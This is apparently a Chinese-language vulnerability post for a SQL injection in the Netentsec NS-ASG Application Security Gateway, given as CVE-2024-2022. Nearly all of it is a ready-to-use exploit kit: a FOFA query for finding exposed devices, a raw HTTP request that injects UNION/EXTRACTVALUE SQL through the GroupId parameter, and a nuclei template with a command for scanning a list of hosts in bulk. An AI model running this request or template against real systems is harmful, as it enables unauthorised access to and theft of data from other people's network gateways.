1、fofa语句
代码语言:yaml复制app="网康科技-NS-ASG安全网关"2、数据包
代码语言:yaml复制GET /admin/list_ipAddressPolicy.php?GroupId=-1 UNION ALL SELECT EXTRACTVALUE(1,concat(0x7e,(select md5(102103122)),0x7e)) HTTP/1.1
Host: XXXXXXXXXXXXXX
Sec-Ch-Ua: "Chromium";v="97", " Not;A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
3、复现截图
4、nuclei POC
基本命令: nuclei.exe -l 网址文件.txt -t POC.yaml
代码语言:yaml复制
id: CVE-2024-2022
info:
name: 网康NS-ASG应用安全网关sql注入漏洞
author: someone
severity: high
description: Netentsec NS-ASG Application Security Gateway 6.3版本中/admin/list_ipAddressPolicy.php接口处存在SQL注入漏洞。通过操纵参数GroupId可以导致SQL注入攻击,攻击者可远程发起攻击窃取数据。
metadata:
max-request: 1
fofa-query: app="网康科技-NS-ASG安全网关"
verified: true
requests:
- raw:
- |
GET /admin/list_ipAddressPolicy.php?GroupId=-1 UNION ALL SELECT EXTRACTVALUE(1,concat(0x7e,(select md5(102103122)),0x7e)) HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
matchers:
- type: dsl
dsl:
- "status_code == 200 && contains(body, '6cfe798ba8e5b85feb50164c59f4bec')"
